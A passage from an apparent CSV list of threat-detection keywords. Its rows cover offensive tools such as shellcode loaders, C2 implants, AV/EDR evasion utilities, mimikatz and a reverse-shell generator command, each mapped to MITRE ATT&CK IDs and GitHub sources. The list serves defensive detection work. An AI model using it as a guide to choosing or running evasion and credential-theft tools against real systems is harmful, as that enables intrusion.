statically detection by AV/EPP/EDR of your C2-shellcode and download and execute your C2-shellcode which is hosted on your (C2)-webserver.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Shellcode-Downloader-CreateThread-Execution,1,1,N/A,N/A,3,229,49,2023-05-25T02:48:55Z,2022-03-27T07:51:08Z -*Shellcode-Downloader-CreateThread-Execution*,offensive_tool_keyword,Shellcode-Downloader-CreateThread-Execution,This POC gives you the possibility to compile a .exe to completely avoid statically detection by AV/EPP/EDR of your C2-shellcode and download and execute your C2-shellcode which is hosted on your (C2)-webserver.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Shellcode-Downloader-CreateThread-Execution,1,1,N/A,N/A,3,229,49,2023-05-25T02:48:55Z,2022-03-27T07:51:08Z -*shellcodeEncryptDecrypt*,offensive_tool_keyword,C2 related tools,An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ShellcodeFluctuation,1,1,N/A,10,10,770,143,2022-06-17T18:07:33Z,2021-09-29T10:24:52Z -*shellcode-exec.ps1*,offensive_tool_keyword,PayGen,FUD metasploit Persistence RAT,T1587 T1048 T1588 T1102 T1041,N/A,N/A,N/A,RAT,https://github.com/youhacker55/PayGen,1,1,N/A,N/A,,N/A,,, -*shellcodeexec.x32*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*shellcodeexec.x64*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*ShellcodeFluctuation.*,offensive_tool_keyword,C2 related tools,An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ShellcodeFluctuation,1,1,N/A,10,10,770,143,2022-06-17T18:07:33Z,2021-09-29T10:24:52Z -*ShellcodeFluctuation64*,offensive_tool_keyword,C2 related tools,An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ShellcodeFluctuation,1,1,N/A,10,10,770,143,2022-06-17T18:07:33Z,2021-09-29T10:24:52Z -*ShellcodeFluctuation86*,offensive_tool_keyword,C2 related tools,An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ShellcodeFluctuation,1,1,N/A,10,10,770,143,2022-06-17T18:07:33Z,2021-09-29T10:24:52Z -*Shellcode-Hide-main*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*Shellcode-Loader-master*,offensive_tool_keyword,Shellcode-Loader,dynamic shellcode loading,T1055 - T1055.012 - T1027 - T1027.005,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ReversingID/Shellcode-Loader,1,1,N/A,10,2,139,30,2023-09-08T06:55:34Z,2021-08-08T08:53:03Z -*ShellcodeRDI.*,offensive_tool_keyword,sRDI,Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/monoxgas/sRDI,1,1,N/A,N/A,10,1855,445,2022-12-14T16:01:43Z,2017-07-28T19:30:53Z -*ShellcodeRDI.py*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*ShellcodeRDI.py*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*shellcode-runner.py*,offensive_tool_keyword,PayGen,FUD metasploit Persistence RAT,T1587 T1048 T1588 T1102 T1041,N/A,N/A,N/A,RAT,https://github.com/youhacker55/PayGen,1,1,N/A,N/A,,N/A,,, -*ShellcodeTemplate.x64.bin*,offensive_tool_keyword,DllNotificationInjection,A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.,T1055.011 - T1055.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ShorSec/DllNotificationInjection,1,1,N/A,10,4,319,56,2023-08-23T13:50:27Z,2023-08-14T11:22:30Z -*shellcodetester *,offensive_tool_keyword,shellcodetester,This tools test generated ShellCodes,T1059.003 - T1059.005 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,POST Exploitation tools,https://github.com/helviojunior/shellcodetester,1,0,N/A,N/A,1,78,28,2023-04-24T22:34:25Z,2019-06-11T04:39:58Z -*ShellCodeTester.csproj*,offensive_tool_keyword,shellcodetester,This tools test generated ShellCodes,T1059.003 - T1059.005 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,POST Exploitation tools,https://github.com/helviojunior/shellcodetester,1,1,N/A,N/A,1,78,28,2023-04-24T22:34:25Z,2019-06-11T04:39:58Z -*shellcodetester.exe*,offensive_tool_keyword,shellcodetester,This tools test generated ShellCodes,T1059.003 - T1059.005 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,POST Exploitation tools,https://github.com/helviojunior/shellcodetester,1,1,N/A,N/A,1,78,28,2023-04-24T22:34:25Z,2019-06-11T04:39:58Z -*shellcodetester.git*,offensive_tool_keyword,shellcodetester,This tools test generated ShellCodes,T1059.003 - T1059.005 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,POST Exploitation tools,https://github.com/helviojunior/shellcodetester,1,1,N/A,N/A,1,78,28,2023-04-24T22:34:25Z,2019-06-11T04:39:58Z -*shellcodetester.sh*,offensive_tool_keyword,shellcodetester,This tools test generated ShellCodes,T1059.003 - T1059.005 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,POST Exploitation tools,https://github.com/helviojunior/shellcodetester,1,1,N/A,N/A,1,78,28,2023-04-24T22:34:25Z,2019-06-11T04:39:58Z -*ShellCodeTester.sln*,offensive_tool_keyword,shellcodetester,This tools test generated ShellCodes,T1059.003 - T1059.005 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,POST Exploitation tools,https://github.com/helviojunior/shellcodetester,1,1,N/A,N/A,1,78,28,2023-04-24T22:34:25Z,2019-06-11T04:39:58Z -*shellerator --reverse-shell --lhost * --lport * --type *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ShellGhost.dll,offensive_tool_keyword,ShellGhost,A memory-based evasion technique which makes shellcode invisible from process start to end,T1055.012 - T1027.002 - T1055.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/lem0nSec/ShellGhost,1,1,N/A,N/A,9,892,102,2023-07-24T12:22:32Z,2023-07-01T16:56:58Z -*ShellGhost.exe*,offensive_tool_keyword,ShellGhost,A memory-based evasion technique which makes shellcode invisible from process start to end,T1055.012 - T1027.002 - T1055.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/lem0nSec/ShellGhost,1,1,N/A,N/A,9,892,102,2023-07-24T12:22:32Z,2023-07-01T16:56:58Z -*ShellGhost.sln*,offensive_tool_keyword,ShellGhost,A memory-based evasion technique which makes shellcode invisible from process start to end,T1055.012 - T1027.002 - T1055.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/lem0nSec/ShellGhost,1,1,N/A,N/A,9,892,102,2023-07-24T12:22:32Z,2023-07-01T16:56:58Z -*ShellGhost.vcxproj*,offensive_tool_keyword,ShellGhost,A memory-based evasion technique which makes shellcode invisible from process start to end,T1055.012 - T1027.002 - T1055.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/lem0nSec/ShellGhost,1,1,N/A,N/A,9,892,102,2023-07-24T12:22:32Z,2023-07-01T16:56:58Z -*ShellGhost_mapping.py*,offensive_tool_keyword,ShellGhost,A memory-based evasion technique which makes shellcode invisible from process start to end,T1055.012 - T1027.002 - T1055.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/lem0nSec/ShellGhost,1,1,N/A,N/A,9,892,102,2023-07-24T12:22:32Z,2023-07-01T16:56:58Z -*ShellGhost-master.zip*,offensive_tool_keyword,ShellGhost,A memory-based evasion technique which makes shellcode invisible from process start to end,T1055.012 - T1027.002 - T1055.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/lem0nSec/ShellGhost,1,1,N/A,N/A,9,892,102,2023-07-24T12:22:32Z,2023-07-01T16:56:58Z -*shellter.exe*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*shepardsbind_recv.py*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*shepbind_serv.exe*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*Sherlock.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*sherlock.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*Sherlock_Vulns.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Shhmon.csproj*,offensive_tool_keyword,shhmon,Neutering Sysmon via driver unload,T1518.001 ,TA0007,N/A,N/A,Defense Evasion,https://github.com/matterpreter/Shhmon,1,1,N/A,N/A,3,210,35,2022-10-13T16:56:41Z,2019-09-12T14:13:19Z -*Shhmon.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*Shhmon.exe*,offensive_tool_keyword,shhmon,Neutering Sysmon via driver unload,T1518.001 ,TA0007,N/A,N/A,Defense Evasion,https://github.com/matterpreter/Shhmon,1,1,N/A,N/A,3,210,35,2022-10-13T16:56:41Z,2019-09-12T14:13:19Z -*Shhmon.git*,offensive_tool_keyword,shhmon,Neutering Sysmon via driver unload,T1518.001 ,TA0007,N/A,N/A,Defense Evasion,https://github.com/matterpreter/Shhmon,1,1,N/A,N/A,3,210,35,2022-10-13T16:56:41Z,2019-09-12T14:13:19Z -*shinject *,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*shinject.nim*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*shinject_ex *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*shocknawe.py*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,1,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*Shodan.io*,offensive_tool_keyword,shodan.io,Shodan is the worlds first search engine for Internet-connected devices.,T1016 - T1597 - T1526 - T1046 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589,TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Information Gathering,https://www.shodan.io/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*shodanp.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*ShorSec/DavRelayUp*,offensive_tool_keyword,DavRelayUp,DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced,T1078 - T1078.004 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/ShorSec/DavRelayUp,1,1,N/A,9,5,446,70,2023-06-05T09:17:06Z,2023-06-05T07:49:39Z -*ShorSec/DllNotificationInjection*,offensive_tool_keyword,DllNotificationInjection,A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.,T1055.011 - T1055.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ShorSec/DllNotificationInjection,1,1,N/A,10,4,319,56,2023-08-23T13:50:27Z,2023-08-14T11:22:30Z -*ShorSec/ShadowSpray*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,1,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*Show-TargetScreen.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*shred --remove*,greyware_tool_keyword,shred,Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.,T1070.004 - T1564.001 - T1027,TA0005 - TA0040 - TA0011,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*shred -u*,greyware_tool_keyword,shred,Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.,T1070.004 - T1564.001 - T1027,TA0005 - TA0040 - TA0011,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*shred -z*,greyware_tool_keyword,shred,Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.,T1070.004 - T1564.001 - T1027,TA0005 - TA0040 - TA0011,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*shred --zero*,greyware_tool_keyword,shred,Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.,T1070.004 - T1564.001 - T1027,TA0005 - TA0040 - TA0011,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*shspawn x64 *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*shspawn x86 *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*shucknt.php*,offensive_tool_keyword,ShuckNT,ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES),T1552.001 - T1555.003 - T1078.003,TA0006 - TA0002 - TA0040,N/A,N/A,Credential Access,https://github.com/yanncam/ShuckNT,1,1,N/A,10,1,36,4,2023-02-02T10:40:59Z,2023-01-27T07:52:47Z -*ShuckNT-main*,offensive_tool_keyword,ShuckNT,ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES),T1552.001 - T1555.003 - T1078.003,TA0006 - TA0002 - TA0040,N/A,N/A,Credential Access,https://github.com/yanncam/ShuckNT,1,1,N/A,10,1,36,4,2023-02-02T10:40:59Z,2023-01-27T07:52:47Z -*ShutdownRepo/pywhisker*,offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,1,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -*ShutdownRepo/smartbrute*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*sid::add*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sid::clear*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sid::lookup*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - 